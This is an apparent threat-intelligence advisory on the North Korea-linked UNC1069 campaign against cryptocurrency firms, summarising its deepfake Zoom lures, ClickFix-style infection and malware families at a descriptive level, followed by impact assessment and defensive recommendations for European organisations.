UNC1069, a North Korea-linked threat actor active since at least 2018, has shifted focus from traditional finance to the cryptocurrency sector, targeting Windows and macOS systems to steal sensitive data and facilitate financial theft. The attack chain starts with social engineering via compromised or impersonated Telegram accounts, where victims are lured into fake Zoom meetings hosted on phishing domains mimicking legitimate Zoom URLs. These meetings use AI-generated or deepfake video to create a convincing illusion of a live call, tricking victims into enabling their cameras and entering personal details. Following this, victims receive a fake error message prompting them to run a ClickFix-style troubleshooting command. On macOS, this command executes an AppleScript that drops a malicious Mach-O binary named WAVESHAPER, which collects system info and deploys multiple malware families including HYPERCALL (a Go-based downloader), HIDDENCALL (a Golang backdoor), DEEPBREATH (a Swift data miner capable of bypassing macOS TCC protections to steal iCloud Keychain and browser data), SUGARLOADER (a C++ downloader), CHROMEPUSH (a C++ browser extension data stealer with keylogging and cookie theft capabilities), and SILENCELIFT (a minimalist backdoor). These tools collectively harvest credentials, session tokens, and sensitive data from browsers (Chrome, Brave, Edge), Telegram, and Apple Notes, enabling financial theft. The campaign demonstrates advanced use of AI for lure creation and malware development, reflecting a significant evolution in UNC1069’s operational sophistication. The attack is highly targeted at cryptocurrency startups, software developers, venture capital firms, and high-tech companies, leveraging social engineering, AI, and multi-stage malware deployment to maximize impact.

European organizations in the cryptocurrency ecosystem face significant risks from UNC1069’s campaign. The theft of credentials, session tokens, and sensitive data can lead to direct financial losses through unauthorized cryptocurrency transfers or theft. Compromise of software developers and venture capital firms could result in intellectual property theft, disruption of funding activities, and reputational damage. The use of AI-generated lures and deepfake videos increases the likelihood of successful social engineering, making detection and prevention more challenging. The multi-platform nature of the attack (Windows and macOS) broadens the scope of affected systems. The campaign’s stealthy backdoors and data stealers can persist undetected, enabling prolonged espionage and financial fraud. For European financial and tech sectors, this threat could undermine trust in cryptocurrency markets and impact regulatory compliance, especially under GDPR due to potential data breaches. The sophistication and targeted nature of the attack suggest it is designed for high-value victims, increasing the potential for significant economic and operational disruption.

European organizations should implement multi-layered defenses tailored to this threat’s unique tactics. First, enhance user awareness training focused on recognizing AI-generated and deepfake social engineering lures, especially on platforms like Telegram and Zoom. Implement strict URL filtering and domain reputation checks to block access to phishing domains mimicking legitimate services. Deploy endpoint detection and response (EDR) solutions capable of identifying suspicious AppleScript executions and unusual downloader behaviors on macOS and Windows. Enforce application whitelisting and restrict the execution of unapproved scripts and binaries. Monitor network traffic for connections to known or suspicious command-and-control servers associated with UNC1069 malware families. Use multi-factor authentication (MFA) on all cryptocurrency-related accounts and internal systems to reduce credential theft impact. Regularly audit and harden macOS Transparency, Consent, and Control (TCC) settings to limit unauthorized access to sensitive data stores like iCloud Keychain. Conduct threat hunting exercises focusing on indicators of compromise related to WAVESHAPER, DEEPBREATH, CHROMEPUSH, and other malware components. Collaborate with threat intelligence sharing communities to stay updated on UNC1069 tactics and indicators. Finally, establish incident response plans specifically addressing social engineering and multi-stage malware attacks targeting cryptocurrency assets.